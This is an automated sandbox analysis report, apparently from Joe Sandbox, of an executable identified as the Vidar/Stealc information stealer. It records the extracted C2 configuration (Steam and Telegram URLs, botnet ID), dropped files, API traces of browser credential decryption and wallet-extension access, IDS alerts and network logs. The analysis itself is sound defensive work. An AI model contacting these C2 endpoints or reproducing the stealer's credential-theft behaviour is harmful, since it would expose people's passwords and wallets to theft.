                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-14T15:26:50.216588+010028032702Potentially Bad Traffic192.168.2.550137185.166.143.49443TCP
                        2024-11-14T15:27:02.768520+010028032702Potentially Bad Traffic192.168.2.550140185.166.143.49443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Found malware configuration
                        Source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199801589826", "https://t.me/m07mbk"], "Botnet": "27536a38d3707b6600f28b9d7177a12c"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\ProgramData\GHDAKKJJJK.exeReversingLabs: Detection: 54%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Updater[1].exeReversingLabs: Detection: 54%
                        Source: C:\Users\user\AppData\Roaming\service.exeReversingLabs: Detection: 54%
                        Source: C:\Windows\SysWOW64\0X1.9B5680P-1008PPDATA\service.exe (copy)ReversingLabs: Detection: 54%
                        Multi AV Scanner detection for submitted file
                        Source: S0FTWARE.exeReversingLabs: Detection: 28%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\ProgramData\GHDAKKJJJK.exeJoe Sandbox ML: detected
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A092A6 CryptUnprotectData,LocalAlloc,LocalFree,3_2_02A092A6
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A13AB9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,3_2_02A13AB9
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0B721 _memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcat,PK11_FreeSlot,lstrcat,3_2_02A0B721
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C68A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,3_2_6C68A9A0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C684440 PK11_PrivDecrypt,3_2_6C684440
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C654420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,3_2_6C654420
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6844C0 PK11_PubEncrypt,3_2_6C6844C0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6D25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,3_2_6C6D25B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C668670 PK11_ExportEncryptedPrivKeyInfo,3_2_6C668670
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C68A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,3_2_6C68A650
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C66E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,3_2_6C66E6E0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6AA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,3_2_6C6AA730
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6B0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,3_2_6C6B0180
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6843B0 PK11_PubEncryptPKCS1,PR_SetError,3_2_6C6843B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6A7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,3_2_6C6A7C00
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C667D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,3_2_6C667D60
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6ABD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,3_2_6C6ABD30
                        Source: S0FTWARE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                        Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:50011 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49704 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49707 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49829 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 116.203.0.159:443 -> 192.168.2.5:49836 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49913 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:50137 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 3.5.30.241:443 -> 192.168.2.5:50138 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 51.105.71.136:443 -> 192.168.2.5:50155 version: TLS 1.2
                        Source: S0FTWARE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000003.00000002.3382859208.000000006F8DD000.00000002.00000001.01000000.00000013.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: freebl3.pdb source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: freebl3.pdbp source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
                        Source: Binary string: BitLockerToGo.pdb source: S0FTWARE.exe, 00000000.00000002.2242921904.0000000012CB6000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.3374753902.0000000035DB4000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.3370381452.0000000029ED5000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
                        Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000003.00000002.3382859208.000000006F8DD000.00000002.00000001.01000000.00000013.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: BitLockerToGo.pdbGCTL source: S0FTWARE.exe, 00000000.00000002.2242921904.0000000012CB6000.00000004.00001000.00020000.00000000.sdmp
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A16A05 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_02A16A05
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A17178 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_02A17178
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0A941 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0A941
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0CE96 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_02A0CE96
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0E5B9 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0E5B9
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A18D90 SHGetFolderPathA,wsprintfA,FindFirstFileA,_mbscmp,_mbscmp,_mbscmp,_splitpath,_ismbcupper,wsprintfA,SHFileOperation,FindNextFileA,FindClose,3_2_02A18D90
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A17D20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A17D20
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0C528 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_02A0C528
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A01D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A01D70
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0C888 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0C888
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1785A GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,3_2_02A1785A
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0DD2A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_02A0DD2A
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A16E7F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,3_2_02A16E7F
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]3_2_02A0149D
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax3_2_02A0149D
                        Source: chrome.exeMemory has grown: Private usage: 1MB later: 39MB

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:49875 -> 116.203.0.159:443
                        Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.0.159:443 -> 192.168.2.5:49875
                        Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.0.159:443 -> 192.168.2.5:49864
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199801589826
                        Source: Malware configuration extractorURLs: https://t.me/m07mbk
                        Performs DNS queries to domains with low reputation
                        Source: DNS query: fuare.xyz
                        Source: global trafficHTTP traffic detected: GET /m07mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1731594585346Host: self.events.data.microsoft.comContent-Length: 7972Connection: Keep-AliveCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 18.245.60.72 18.245.60.72
                        Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
                        Source: Joe Sandbox ViewIP Address: 20.125.209.212 20.125.209.212
                        Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                        Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50155 -> 51.105.71.136:443
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:50137 -> 185.166.143.49:443
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:50140 -> 185.166.143.49:443
                        Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:50011 version: TLS 1.0
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.52.241.40
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.52.241.40
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.52.241.40
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.52.241.40
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.52.241.40
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.52.241.40
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.52.241.40
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.52.241.40
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.52.241.40
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.52.241.40
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A06AE1 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,_memmove,lstrlen,lstrlen,_memmove,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_02A06AE1
                        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OKvleD1bOO+N2GM&MD=X99kat3G HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                        Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
